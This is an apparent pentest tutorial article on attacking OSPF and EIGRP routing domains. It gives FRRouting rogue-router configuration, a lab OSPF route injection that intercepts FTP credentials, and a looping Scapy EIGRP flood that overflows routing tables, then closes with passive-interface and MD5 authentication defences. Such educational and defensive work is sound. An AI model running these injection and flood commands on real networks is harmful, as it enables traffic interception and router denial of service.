warning
This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.
All major corporate networks use dynamic routing. Routers on the network exchange routing information with each other automatically so that the network admin doesn’t have to set up all their routes manually. In most cases, the admin doesn’t configure the protective mechanisms at all. And this opens the way for exploitation.
info
Both OSPF and EIGRP belong to the class of interior gateway protocols (IGP). Such protocols are used to transmit routing information within the same Autonomous System (AS). For convenience purposes, you can imagine it as a network of some organization.
Problems, impact, and weapon
OSPF
OSPF (Open Shortest Path First) belongs to a type of protocols based on link state tracking. Attacking OSPF is a bit more difficult job in comparison with its relative EIGRP. Two things can complicate an attack:
- multiple OSPF zones. Engineers can design an OSPF routing domain with multiple zones to reduce the load on computing resources of the routers. This must be taken into account when you penetrate into an OSPF routing domain. Also keep in mind that packets can be transmitted between these zones. For instance, if you are going to perform a route injection; and
- lack of response to queries. To connect to a routing domain, the attacker must ensure that the fake router generates and receives
Hello
messages from neighbors and simulates the establishment of neighborship with them. Otherwise, the fake router will be recognized ‘dead’ and excluded from the routing domain, thus, making it impossible for the attacker to take further steps.
The best way to attack an OSPF domain is to gain control over a legitimate router on the network. Alternatively, you can create an ‘evil’ virtual router on your side and connect to the domain. However, to do this, have to parse OSPF multicast packets and examine the following parameters in the packet:
- OSPF Hello Interval;
- OSPF Dead Interval; and
- presence of authentication.
Even if OSPF is protected by authentication, and the passwords are stored as MD5 hashes, there is still a chance for the attacker to guess them.
EIGRP
EIGRP (Enhanced Interior Gateway Routing Protocol) belongs to the class of distance-vector protocols. It was developed by Cisco Systems as a replacement for the IGRP protocol. EIGRP routers exchange routing information using the Diffuse Update Algorithm (DUAL) to plot routes within the same AS. EIGRP stores all available backup routes to destination networks in the routing table, which makes it possible to quickly switch to a backup route if necessary.
info
Did you know that EIGRP is no longer a Cisco proprietary protocol and it’s now open to other network equipment vendors? EIGRP became an open standard in 2013, and the respective documentation RFC 7868 was published in 2016.
To connect to an EIGRP routing domain, the attacker must know the autonomous system number. It can be extracted, for instance, from a traffic dump using Wireshark. Unlike an OSPF domain that can be divided into multiple routing zones, an EIGRP autonomous system is flat: if you make a route injection, your route will likely spread throughout the entire domain.
Impact
Attacks ON Dynamic routing can be divided into three types:
- Network enumeration. If an attacker connects to the routing domain, they can perform network reconnaissance and discover some subnets. This is a rather useful trick since classical scans (e.g. with Nmap) take a long time. In addition, they can trigger IDS/IPS security systems. After connecting to a routing domain, you can collect information about subnets advertised by neighboring routers. Note that this method doesn’t guarantee the detection of all subnets in the organization. But it can bring you an easier win when you conduct a pentesting study.
- MITM (man in the middle). In essence, you inject a route to intercept traffic from the target host or network. After connecting to the routing domain, you can make an advertisement in the domain that literally looks as follow: “Dear all, the host whose IP address is 192.168.1.43/24 is now accessible via me, 192.168.1.150.” The routers in the domain will accept the new information and add the route you have advertised to the routing table. Important: routers use metrics to make routing decisions. If your route is worse than others in terms of path cost, it won’t be included in the routing table. Why? Because the routing table stores only the best paths to destination networks.
- DoS (Denial of Service). Routing table overflow: all router’s CPU and RAM resources are depleted. If the routing table is overflowed, it becomes impossible to add a new legitimate route to it. The router won’t be able to add to its table the route to a new network that has just appeared.
Lethal weapon: FRRouting
FRRouting is an open source solution that creates a virtual router in Unix/Linux. The virtual router supports such protocols as BGP, OSPF, EIGRP, RIP, etc.
Using FRRouting, you can deploy a ‘rogue’ router on your side, start routing, and connect to the target routing domain. Why is this required? Because, if you perform a route injection without joining the domain and establishing a neighborship, then the routes you advertise won’t be included into the neighbors’ routing tables. Instead, they will just disappear.
www
I strongly recommend reviewing the FRRouting documentation; it addresses all important aspects, including installation and configuration.
Configuring FRRouting
First, you have to enable daemons in the daemons
configuration file. You will need the ospfd
and eigrpd
daemons. It’s also necessary to enable the staticd
daemon to ensure that custom static routes are redistributed correctly.
nano /etc/frr/daemons
ospfd=yeseigrpd=yesstaticd=yes
Then you set a password to connect to the router control panel via VTY lines:
nano /etc/frr/frr.conf
password letm3in
Finally, you enable traffic forwarding. By default, it’s disabled in Linux distributions.
sudo sysctl -w net.ipv4.ip_forward=1
Starting the frr
daemon.
systemctl start frr
Using the vtysh
command, you access the control panel of the FRRouting virtual router.
Virtual lab
The networks shown below will be used as test polygons.
In the context of an attack on OSPF, I will examine a route injection with subsequent traffic interception. With regards to EIGRP, I will explain how to deliver a destructive attack involving a routing table overflow (to avoid demonstrating the same attack). Thus, two attack variants will be addressed. OSPF can be attacked in the same way as EIGRP. However, keep in mind that destructive attacks are less practical in terms of production. Perhaps, such scenario can be useful for the Red Team as a diversionary maneuver…
Route injection and traffic interception in an OSPF domain
To successfully perform route injection, you have to connect to the OSPF routing domain and advertise the network. Specify area 0.
c0ldheim@kali:~$ sudo vtyshkali# conf tkali(config)# router ospfkali(config-router)# network 172.20.20.50/32 area 0.0.0.0
Enable redistribution of static routes with the lowest metrics so that the injected route has the lowest cost.
kali(config-router)# redistribute static metric 0
Advertise a static route in the OSPF domain: “The host whose IP address is 172.20.20.20 is now accessible via me, 172.20.20.50.”
kali(config)# ip route 172.20.20.20/32 eth0
Checking the routing table on router R2:
R2#show ip routeCodes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 E1 - OSPF external type 1, E2 - OSPF external type 2 i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2 ia - IS-IS inter area, * - candidate default, U - per-user static route o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP a - application route + - replicated route, % - next hop override, p - overrides from PfRGateway of last resort is not set 10.0.0.0/8 is variably subnetted, 2 subnets, 2 masksC 10.1.1.0/24 is directly connected, GigabitEthernet0/0L 10.1.1.2/32 is directly connected, GigabitEthernet0/0 172.20.0.0/16 is variably subnetted, 4 subnets, 2 masksC 172.20.20.0/24 is directly connected, GigabitEthernet0/2O E2 172.20.20.20/32 [110/0] via 172.20.20.50, 00:02:27, GigabitEthernet0/2L 172.20.20.254/32 is directly connected, GigabitEthernet0/2O 172.20.30.0/24 [110/2] via 10.1.1.3, 01:08:17, GigabitEthernet0/0R2#
As you can see, the route injection was successful. R2 now believes that the host at 172.20.20.20 is accessible via your attacking machine.
Next, let’s try to connect from the DevOps host to the FTP server at 172.20.30.100.
As a result, you have squeezed between the host and the FTP server and intercepted the unencrypted credentials.
Route injection and routing table overflow in an EIGRP domain
First, you connect to an autonomous EIGRP system and advertise a network.
c0ldheim@kali:~$ sudo vtyshkali# conf tkali(config)# router eigrp 1kali(config-router)# network 172.20.20.50/32
This time, I am going to use the Scapy networking library to inject EIGRP routes.
c0ldheim@kali:~$ sudo scapy3>>> from scapy.contrib.eigrp import * # Import module to work with EIGRP headers>>> frame = Ether(dst="01:00:5e:00:00:0a") # Build Ethernet frame with the MAC address of the multicast advertisement destination>>> ip = IP(src="172.20.20.50", dst="224.0.0.10") # Build IP packet with the IP address of the multicast EIGRP advertisement destination>>> eigrp = EIGRP(opcode=1, asn=1, seq=0, ack=0, tlvlist=[EIGRPExtRoute(dst=RandIP(), nexthop="172.20.20.50")]) # Build EIGRP packet with the Update option>>> crafted = frame/ip/eigrp # Assemble the three layers together>>> sendp(crafted, loop=1, iface="eth0") # Put on a loop the transmission of the assembled malicious EIGRP packet
If you check the router control panel, you’ll see that the CPU load has increased significantly reaching 87%.
R2#show ip route summaryIP routing table name is default (0x0)IP routing table maximum-paths is 32Route Source Networks Subnets Replicates Overhead Memory (bytes)connected 0 6 0 408 1080static 1 0 0 68 180application 0 0 0 0 0eigrp 1 481 3088 0 328348 642420internal 1192 358080Total 1674 3094 0 328824 1001760
If the routing table is overflowed, the router cannot add new routes to its routing table.
How to prevent attacks on routing domains
Use passive interfaces. Configuring passive interfaces in the dynamic routing context prevents the router from sending advertisements via certain interfaces. By default (i.e. if you don’t configure passive interfaces), it sends advertisements to all interfaces, which puts the routing domain at great risk. A legitimate user on the network can deploy a virtual router in the same way as shown above and attack the routing domain.
info
In this article, I stick to the Cisco IOS CLI principles and commands.
A configuration example for OSPF:
R2#conf t # Enter global configuration mode
R2(config)# router ospf 1 # Enter the OSPF configuration mode as process 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive
An example for EIGRP:
R2#conf t # Enter global configuration mode
R2(config)# router eigrp 1 # Enter the EIGRP configuration mode in autonomous system 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive
Use Authentication. The use of authentication in routing domains ensures that only authorized, legitimate routers can log in. Authentication involves passwords. If you want to secure the routing domain using authentication, make sure the passwords you use are strong enough. Keep in mind that they are hashed using cryptographic hash functions, and the attacker can read hash values from the traffic dump and brute-force a password. Having a password, the attacker can easily connect to the routing domain.
Configuring authentication for OSPF using MD5:
R2#conf t # Enter global configuration mode
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip ospf authentication message-digest # Enable MD5 authentication
R2(config-if)# ip ospf message-digest-key 1 md5 y0ur_f4ult # Set password with key-id 1
Configuring authentication for EIGRP using key-chain and MD5:
R2#conf t # Enter global configuration mode
R2(config)# key chain SecureRouting # Create a key chain called SecureRouting
R2(config-keychain)# key 1 # Create first key
R2(config-keychain-key)# key-string y0ur_f4ult # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config-keychain)# key 2 # After the expiry of the first key, the second key will be used automatically. Create second key
R2(config-keychain-key)# key-string y0ur_des1re # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip authentication mode eigrp 1 md5 # Enable MD5 authentication for autonomous system EIGRP 1
R2(config-if)# ip authentication key-chain eigrp 1 SecureRouting # Specify key-chain to be used for authentication in autonomous system EIGRP 1
Conclusions
This article analyzes attack scenarios targeting the OSPF and EIGRP dynamic routing protocols. Based on my personal pentesting experience, in most cases, network admins don’t configure protection mechanisms embedded in these protocols. The most common OSPF/EIGRP configuration neither does include authentication, nor its passive interfaces are configured. This puts the security of the local network at great risk.
Hopefully, the above information will be of interest both for pentesters (who can implement these attacks) and network admins (who can boost the security of their routing domains).
Good luck!